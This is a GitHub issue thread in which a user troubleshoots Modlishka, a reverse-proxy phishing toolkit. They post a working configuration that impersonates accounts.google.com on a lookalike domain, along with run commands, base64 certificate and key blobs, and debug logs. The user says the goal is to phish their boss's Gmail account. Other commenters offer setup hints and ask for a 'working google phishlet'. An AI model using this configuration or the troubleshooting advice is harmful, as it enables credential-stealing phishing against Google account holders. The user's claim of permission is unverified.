### ISSUE TITLE
I cant seem to get things working, help!

### ISSUE THREAD

**Issue by thecityofhereafter** [drk1wi/Modlishka#61]
I'm switching from evilginx2, so I have some experience w/ phishing toolkits.

What am I supposed to use for cert pool? there is no ca.cert generated by autocert in the project directory. I used the letsencrypt master ca cert from the lets encrypt website? is this correct?

I get "ERR CONNECTION REFUSED" with the following .json file:

{
  "phishingDomain": "accounts.google.com.verify.computer",
  "listeningPort": "443",
  "listeningAddress": "0.0.0.0",
  "target": "https://accounts.google.com",
  "targetResources": "content.googleapis.com,www.gstatic.com,ssl.gstatic.com,ogs.google.com,accounts.google.com,clients1.google.com,clients2.google.com,clients3.google.com,clients4.google.com,clients5.google.com,clients6.google.com",
  "targetRules": "",
  "terminateTriggers": "",
  "terminateRedirectUrl": "",
  "trackingCookie": "ident",
  "trackingParam": "ident",
  "useTls": true,
  "jsRules":"",
  "debug": false,
  "logPostOnly": false,
  "disableSecurity": false,
  "log": "google.log",
  "plugins": "all",
  "credParams": "dHJ1ZVxdLCIoW15cV10rKSJd,XGJudasdfWxsLFxbIihbYS16QS1aMC05IiEasdfiIyQlJicoKSorsdfwr34tdfvwLC0uLzo7PD0+P0BeX2B7fHaw4sdf1+XSspIixudWxsXGI=",
  "cert": "LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUVLVENDQXhHZ0F3SUJBZ0lVZGo4bEpUaURsNEJBenBCcFlpZGY5V1BjWXZVd0Rsdf4tsRWUpLb1pJaHZjTkFRRUwKQlFBd2dhTXhDekFKQmdOVkJBWVRBa0ZWTVJNd0VRWURWUVFJREFwRFlXeHBabTl5Ym1saE1SWXdGQVlEVlFRSApEQTFOYjNWdWRHRnBiaUJXYVdWM01SVXdFd1lEVlFRS0RBeEhiMjluYkdVc0lFbHVZeTR34tdf4Q3pBSkJnTlZCQXNNCkFrbFVNUmd3RmdZRFZRUUREQTkyWlhKcFpua3VZMjl0Y0hWMFpYSXsdf4hLVEf43FuQmdrcWhraUc5dzBCQ1FFV0duQnYKYzNSdFlYTjBaWEpBZG1WeWFgXWjVMbU52YlhCMWRHVnlNQjRYRFRFNU1ESXdOakE1TkRZd05sb1hEVEl4TVRFeQpOakE1TkRZd05sb3dnYU14Q3pBSkJnTlZCQVlUQWtGVk1STXdFUVlEVlFRSURBcERZV3hwWm05eWJtbGhNUll3CkZBWURWUVFIREExTmIzVnVkR0ZwYmlCV2FXVjNNUlV3RXdZRFZRUUtEQXhIYjI5bmJHVXNJRWx1WXk0eEN6QUoKQmdOVkJBc01Ba2xVTVJnd0ZnWURWUVFEREE5MlpYSnBabmt1WTI5dGNIVjBaWEl4S1RBbkJna3Foa2lHOXcwQgpDUUVXR25CdmMzUnRZWE4wWlhKQWRtVnlhV1o1TG1OdmJYQjFkR1Z5TUlJQklwefqQU5CZ2txaGtpRzl3MEJBUUVGCkFBT0NBUThBTUlJQkNnS0NBUUVBdTNZTUNva1puZGpQNnRQd0tHTWdFNndRTmNQdVVCeXlHQ2JPMkRkcWY0TDQKSVFmbDUzVUV4aHArd1l5ajVGYmxvYmtMS2lXMzBKNlVLMm5Cc29DZVZZc1NkYm41VlBESkxYT3NhSnZlOG9udwpuNEkweDk4NVdwMUxsQTBmdVdWTTBCV283MXlNYVN4N2w2Vk9MSkdvd1dLZDBKbC9qeWtXZ0toOGlnVHRXbmdJCjVyVmpFUWY4NUZsMVZvZ0YvMHZ2Z25iSVh4YVp6RzFOYmNOakFBQjlGczVPRkcxL0J6Mk5QSjJrZjI2UzBCRGoKVS9iekJ3Y3NvUVVqVnA2bzlKRnBETG5PWnZVTkE5MnJ2ZkVod0E4ekdqMDJBV2x3Q0tzeUtkczNZYWxaRjVBawpzdFlVZktIczN6bTY5c09pa1B0aUFmVEVnQkxsSlRycC9FZmJKZzJ6MVFJREFRQUJvMU13VVRBZEJnTlZIUTRFCkZnUVVSWkZxbXM3bHZqVXBzVjVjV0hQaUNCYllKRjR3SHdZRFZSMGpCQmd3Rm9BVVJaRnFtczdsdmpVcHNWNWMKV0hQaUNCYllKRjR3RHdZRFZSMFRBUUgvQkFVd0F3RUIvekFOQmdrcWhraUc5dzBCQVFzRkFBT0NBUUVBcHdCNwpoUVpsZEpKWjF3S2RtWUFYcjdZb1pPZ0VlMXpXczFoVnpjcERqOEZScW8vSmEvU3VhUGkwQ1VXQ0prb3FSVDFkCjY4NnFDai80bEljZXhBblVXK0hRbHNIdmluMlFJMlYxNWhRTWxqdXBlazBkNHMrVVN2S3V6N2NaYVpaZDVPczEKL3c3NjlRSzFzS2JRbFlkMTlCQnkzNHVsZ1l3M0R3aHdtV09WT0UwZi8wTHVoajc4NVJQMlhuSS9OTitCVVhvQQo2R0hGTVZyc2ZmaE9mMUNodGxpRURDNE5BNzBNZ1lSTkswZElZaFBqMEZUVzJSL2ZPNVl1c2tHcEQxRmoybEIyCmpHU0lpdHFHL1FpLzNDMlVnaDBhcDZDa3RUcndTTno1a1BoMmRSUFFEMGdQQTVRUENJYVNsQ3ZjWFZhTjdFcDkKMmxEQnVJTlcyakR5Y25qdS9RPT0KLS0tLS1FTkQgQ0VSVElGSUNBVEUtLS0tLQ==",
  "certKey": "LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcEFJQkFBS0NBUUVBdTNZTUNva1puZGpQNnRQd0tHTWdFNndRTmNQdVVCeXlHQ2JPMkRkcWY0TDRJUWZsCjUzVUV4aHArd1l5ajVGYmxvYmtMS2lXMzBKNlVLMm5Cc29DZVZZc1NkYm41VlBESkxYT3NhSnZlOG9ud240STAKeDk4NVdwMUxsQTBmdVdWTTBCV283MXlNYVN4N2w2Vk9MSkdvd1dLZDBKbC9qeWtXZ0toOGlnVHRXbmdJNXJWagpFUWY4NUZsMVZvZ0YvMHZ2Z25iSVh4YVp6RzFOYmNOakFBQjlGczVPRkcxL0J6Mk5QSjJrZjI2UzBCRGpVL2J6CkJ3Y3NvUVVqVnA2bzlKRnBETG5PWnZVTkE5MnJ2ZkVod0E4ekdqMDJBV2x3Q0tzeUtkczNZYWxaRjVBa3N0WVUKZktIczN6bTY5c09pa1wefsdv2tB0aUFmVEVnQkxsSlRycC9FZmJKZzJ6MVFJREFRQUJBb0lCQVFDaEhmRjFjS1pTczFEbwpMS1lCb0VpbWY4sdg34tgergRWk1TFpEcHBZdkNkUEhvOEZsdktRVWg1eENsYUczdm5mcFZENWNkNDgvc3pIMFZKeXFzbEQ1CkN4bE9tUnI4dk4zdHp4eUxzN1BFMitGM3UxZ2dMd3hmbStKUFV2MFJjNVhNdG9ib3FqY2R0VEFRSWdRUU5RbzQKcVB3S2RGcU5jM3ZlR0wrNHhJQ3hyWjMwWmcyMkxYR1JFLzVlUGxFK3FRdDB4S1BRRzFoYThzM1F4dWc4ak9tcgpsMDBKbnJFKzZtOENqTGR0Z0tobm1KQ3U4dTBKaUJORHpqa1JHTWJyRmVHTkt3cmtqTnR2SXR0aVJNSkI5cnlOCkxDc1RRT0FYNWtjV2RvdUl3KzkxSlFjaG80SWVIdmdTUEl0NStHd1MrYVMrRVpDQWlTYmtkNVoyNjByUS9ZT20KdUpmK3dDK2hBb0dCQU9nQitLb1pqZmdJYjN4bnJicGxUQUxkSmh1aWtSYnJVeVhNbnN5bS9KQTRCRk5Yb0Jwdgp4U1NRNER5U0RKNytlVjJhdE5teFB2bGZaZHlvVjZWYk1lM09tUWVvL01NR0srMzdiN0RKbzgyUm45M1dzekZmCmdJdnAzMVdKekhiajZjS3lNTzVTSFdLdFdPcmNjSytOQVNLbmE5SS9mbFNVdUNoZHZUd2E1YW9KQW9HQkFNN1kKeHV4OGl4aXhhdnpXZ29XU29iaHFJRlljMnpTQUo0bmJHcUdSeE1MUmRLcnJsRjVKYzg5VE81cEhIQStvbkMregovUXRqMFQ2V1hmb052OHRTVkJHN3JMdmRsb2ovZ05GVnhUb25ZY0F6WDUvMnNWaHJlZ2VKbUdTd0E4Nmc3QjA3Cm5MemdkK0w3WkFudHc3Z1NpVkJwa0E0SWFtcW1WWFdEbVNnNGJWNXRBb0dBRC9WeXdXQ1luMk1WS0IySm1iUzIKRWN4Y2ZySWtBTXVYSUpaK3BkMG1xbFR3Rnp1RHk4MjhaZE9CV1NsQ3JQMGNKQkFzT0gwMHM3cVlLeUY1UmVxTAorS3VwWXhtQXFYbVhNL3VEcDBsM2R3QjVXcTBXRG1OZldFQnlHRlF1T0U5ZEdRTmcwa1BidVpucTc5elI4NEZqCmZwcTlrK3pDSjlkREE2UFBESDlkSk9FQ2dZRUFuVFRTVXhBQTQzNk1FcWV4d1hVRkpsUzZTTmhiblpZODlxQW8KcUYxU1RzTEVTZGNNQjNFSjdLdVVwQmVoY3lFeHUydXZTVVhPMVNPUlB5Zk4rZWlUYm5yVnVGNmNOM2tBM1ppegpjaFJXVGE1OTRlU3JPc2xNa0lmNTQ2U0c4RGNMM05mZXN3cGk4NGNlckJFaDdEZGlWMVF6b1FheVltWVNrMksyCk40UlRVeTBDZ1lBN2kvbTJzeCtZYnJJWjh0M0tuMlpKVXpFMkVFUHZrbFM2dTZya3VyWXZJVnJ5clQxUS9nOEMKYkVtdm9LaUZEV2ZSZDBWTFdGR085MFNrbUhXNjF2b2hkdncrS3FUMkE1ODh6SWNjTU9NWG51UFk4UVNhaGEyMwp1Q3ZkOEx1MmFGVjQ0bCtmTmNwb1pjM3U5dSt1RmQzSmNTL3BYSERaOGdmR1AzUGIxbVUxNmc9PQotLS0tLUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQ==",
  "certPool": "LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUZhekNDQTFPZ0F3SUJBZ0lSQUlJUXo3RFNRT05aUkdQZ3UyT0Npd0F3RFFZSktvWklodmNOQVFFTEJRQXcKVHpFTE1Ba0dBMVVFQmhNQ1ZWTXhLVEFuQmdOVkJBb1RJRWx1ZEdWeWJtVjBJRk5sWTNWeWFYUjVJRkpsYzJWaApjbU5vSUVkeWIzVndNUlV3RXdZRFZRUURFd3hKVTFKSElGSnZiM1FnV0RFd0hoY05NVFV3TmpBME1URXdORE00CldoY05NelV3TmpBME1URXdORE00V2pCUE1Rc3dDUVlEVlFRR0V3SlZVekVwTUNjR0ExVUVDaE1nU1c1MFpYSnUKWlhRZ1UyVmpkWEpwZEhrZ1VtVnpaV0Z5WTJnZ1IzSnZkWEF4RlRBVEJnTlZCQU1UREVsVFVrY2dVbTl2ZENCWQpNVENDQWlJd0RRWUpLb1pJaHZjTkFRRUJCUUsf23tsdfsdv34tFEZ2dJUEFEQ0NBZ29DZ2dJQkFLM29KSFAwRkRmem01NHJWeWdjCmg3N2N0OTg0a0l4dVBPWlhvSGozZGNLaS92VnFidllBVHlqYjNtaUdiRVNUdHJGai9SUVNhNzhmMHVveG15RisKMFRNOHVrajEzWG5mczdqL0V2RWhta3ZCaW9aeGFVcG1abXlQZmp4d3Y2MHBJZ2J6NU1EbWdLN2lTNCszbVg2VQpBNS9UUjVkOG1VZ2pVK2c0cms4S2I0TXUwVWxYaklCMHR0b3YwRGlOZXdOd0lSdDE4akE4K28rdTNkcGpxK3NXClQ4S09FVXQrend2by83VjNMdlN5ZTByZ1RCSWxESENOQXltZzRWTWs3QlBaN2htL0VMTktqRCtKbzJGUjNxeUgKQjVUMFkzSHNMdUp2VzVpQjRZbGNOSGxzZHU4N2tHSjU1dHVrbWk4bXhkQVE0UTdlMlJDT0Z2dTM5NmozeCtVQwpCNWlQTmdpVjUrSTNsZzAyZFo3N0RuS3hIWnU4QS9sSkJkaUIzUVcwS3RaQjZhd0JkcFVLRDlqZjFiMFNIelV2CktCZHMwcGpCcUFsa2QyNUhON3JPckZsZWFKMS9jdGFKeFFaQktUNVpQdDBtOVNUSkVhZGFvMHhBSDBhaG1iV24KT2xGdWhqdWVmWEtuRWdWNFdlMCtVWGdWQ3dPUGpkQXZCYkkrZTBvY1MzTUZFdnpHNnVCUUUzeERrM1N6eW5UbgpqaDhCQ05BdzFGdHhOclFIdXNFd01GeEl0NEk3bUtaOVlJcWlveW1DekxxOWd3UWJvb01EUWFIV0JmRWJ3cmJ3CnFIeUdPMGFvU0NxSTNIYWFkcjhmYXFVOUdZL3JPUE5rM3NnckRRb28vL2ZiNGhWQzFDTFFKMTNoZWY0WTUzQ0kKclU3bTJZczZ4dDBuVVc3L3ZHVDFNME5QQWdNQkFBR2pRakJBTUE0R0ExVWREd0VCL3dRRUF3SUJCakFQQmdOVgpIUk1CQWY4RUJUQURBUUgvTUIwR0ExVWREZ1FXQkJSNXRGbm1lN2JsNUFGemdBaUl5QnBZOXVtYmJqQU5CZ2txCmhraUc5dzBCQVFzRkFBT0NBZ0VBVlI5WXFieXlxRkRRRExIWUdta2dKeWtJckdGMVhJcHUrSUxsYVMvVjlsWkwKdWJoekVGblRJWmQrNTB4eCs3TFNZSzA1cUF2cUZ5RldoZkZRRGxucnp1Qlo2YnJKRmUrR25ZK0VnUGJrNlpHUQozQmViWWh0RjhHYVYwbnh2d3VvNzd4L1B5OWF1Si9HcHNNaXUvWDErbXZvaUJPdi8yWC9xa1NzaXNSY09qL0tLCk5GdFkyUHdCeVZTNXVDYk1pb2d6aVV3dGhEeUMzKzZXVndXNkxMdjN4TGZIVGp1Q3ZqSElJbk56a3RIQ2dLUTUKT1JBekk0Sk1QSitHc2xXWUhiNHBob3dpbTU3aWF6dFhPb0p3VGR3Sng0bkxDZ2ROYk9oZGpzbnZ6cXZIdTdVcgpUa1hXU3RBbXpPVnl5Z2hxcFpYakZhSDNwTzNKTEYrbCsvK3NLQUl1dnRkN3UrTnhlNUFXMHdkZVJsTjhOd2RDCmpOUEVscHpWbWJVcTRKVWFnRWl1VERrSHpzeEhwRktWSzdxNCs2M1NNMU45NVIxTmJkV2hzY2RDYitaQUp6VmMKb3lpM0I0M25qVE9RNXlPZisxQ2NlV3hHMWJRVnM1WnVmcHNNbGpxNFVpMC8xbHZoK3dqQ2hQNGtxS09KMnF4cQo0Umdxc2FoRFlWdlRIOXc3alhieUxlaU5kZDhYTTJ3OVUvdDd5MEZmLzl5aTBHRTQ0WmE0ckYyTE45ZDExVFBBCm1SR3VuVUhCY25XRXZnSkJRbDluSkVpVTBac252Z2MvdWJoUGdYUlI0WHEzN1owajRyN2cxU2dFRXp3eEE1N2QKZW15UHhnY1l4bi9lUjQ0L0tKNEVCcytsVkRSM3ZleUptK2tYUTk5YjIxLytqaDVYb3MxQW5YNWlJdHJlR0NjPQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0t"
}

**Comment by thecityofhereafter** [comment]
sudo ./dist/proxy -target accounts.google.com -phishingDomain accounts.google.com.verify.computer -listeningPort 443 

Also gives me ERR CONNECTION REFUSED.

I have no firewall. This is a VPS. I own the domain, and it is properly configured.

**Comment by thecityofhereafter** [comment]
I followed the guide and just used the openssl commands to generate a certificate. I did not use acme.sh. I tried but haven't used the tool before and didn't want to take the time to figure it out.

**Comment by thecityofhereafter** [comment]
I've gotten a little further, but now I get invalid certificate have to click advanced/continue, and the url rewrites to: https://www.accounts.accounts.google.com.verify.computer.verify.computer/

I have the .json file set to accounts.google.com.verify.computer ?

**Comment by thecityofhereafter** [comment]
It's my birthday today, if any of you poor strange souls on the internet take pity on me me, I'd really appreciate it. My boss is going to give me a raise if I can successfully phish my way into his gmail account and show him how I did it, and I really am not having luck with either modlishka or evilginx2.

**Comment by drk1wi** [comment]
hm, try setting the target using http/https. check out the wiki for a quick start quide and parameter descriptions

**Comment by thecityofhereafter** [comment]
2019/02/10 19:23:36 http: TLS handshake error from 104.34.29.226:50741: EOF

**Comment by thecityofhereafter** [comment]
I'm apparently doing something wrong with the certificates? 

I used an online tool to base64 encode the cert and key.. I included the -----BEGIN RSA PRIVATE KEY----- and -----END RSA PRIVATE KEY----- parts in the base64 encode, is this correct for your tool?

I left the "CredParams" exactly as it was in the default google json file under templates.

For Certificate Pool I base64 encoded the "Let’s Encrypt Authority X3 (IdenTrust cross-signed)" root certificate and pasted it in.

Is this all correct?

Because I'm getting SSL errors when I turn off TLS.

You don't include any instructions regarding the CertPool and CredParams in the WiKi?

Thanks.

**Comment by thecityofhereafter** [comment]
Also no matter what I do it keeps rewriting the URL to: 
http://www.accounts.accounts.google.com.verify.computer.verify.computer

I'm just trying with TLS off and using port 80...

**Comment by thecityofhereafter** [comment]
Listening on: [0.0.0.0:80] 
Proxying [verify.computer:80] via --> [http://google.com] 
[Sun Feb 10 19:53:07 2019]  DBG  Subdomain: www.accounts.accounts.google.com. 
[Sun Feb 10 19:53:07 2019]  DBG  Standard subdomain: www.accounts.accounts.google.com. 
[Sun Feb 10 19:53:07 2019]  DBG  [RP] Checking domain: www.accounts.accounts.google.com..google.com 
[Sun Feb 10 19:53:07 2019]  DBG  [P] Proxying target [https://www.accounts.accounts.google.com..google.com] via phishing [verify.computer]
[Sun Feb 10 19:53:07 2019]  DBG  PatchHeaders: HTTPRequest took 1.138µs
[Sun Feb 10 19:53:07 2019]  DBG  rewriteRequest took 283.114µs
[Sun Feb 10 19:53:07 2019]  DBG  [Proxy error][Error: dial tcp: lookup www.accounts.accounts.google.com..google.com: no such host]
[Sun Feb 10 19:53:09 2019]  DBG  Subdomain: www.accounts.accounts.google.com. 
[Sun Feb 10 19:53:09 2019]  DBG  Standard subdomain: www.accounts.accounts.google.com. 
[Sun Feb 10 19:53:09 2019]  DBG  [RP] Checking domain: www.accounts.accounts.google.com..google.com 
[Sun Feb 10 19:53:09 2019]  DBG  [P] Proxying target [https://www.accounts.accounts.google.com..google.com] via phishing [verify.computer]
[Sun Feb 10 19:53:09 2019]  DBG  PatchHeaders: HTTPRequest took 1.227µs
[Sun Feb 10 19:53:09 2019]  DBG  rewriteRequest took 206.384µs
[Sun Feb 10 19:53:09 2019]  DBG  [Proxy error][Error: dial tcp: lookup www.accounts.accounts.google.com..google.com: no such host]
^C

**Comment by xornion** [comment]
Looks like you had messed up with the base64 encoding thus resulting corrupt certificates.

**Comment by xornion** [comment]
would you mind sharing your working google phishlet.

**Comment by Ayushraj1** [comment]
use port 80

**Comment by thecityofhereafter** [comment]
Hi xornion, thanks for the reply, I think I just modified them for the post so I didn't have to regenerate the private key... How did I miss up with the certs base64 encoding? Maybe the site I used to encode was bad? Should I have included the opening and closing comments when I base64 encoded? Or just the certificate string? Thanks.

**Comment by thecityofhereafter** [comment]
It keeps adding extra subdomains too like www.accounts.Accounts.google.com.verify.computer is this normal? It should just be accounts. Google.com.verify.computer ?

**Comment by xornion** [comment]
As suggested above by @drk1wi please read [wiki](https://github.com/drk1wi/Modlishka/wiki)

**Comment by thecityofhereafter** [comment]
Thanks! I was making some rookie mistakes with my certificates, I got most of it ironed out and no more cert errors or complaints, but the google.com_gsuite.json template seems to complain that the password is invalid, and seems to be collecting it anyway but not collecting the username/email? is it broken in its current state against google updates or something?

**Comment by drk1wi** [comment]
hm, how does it complain that the password is invalid? I don't remember implementing anything like that.

**Comment by drk1wi** [comment]
closing as resolved, due to lack of response.
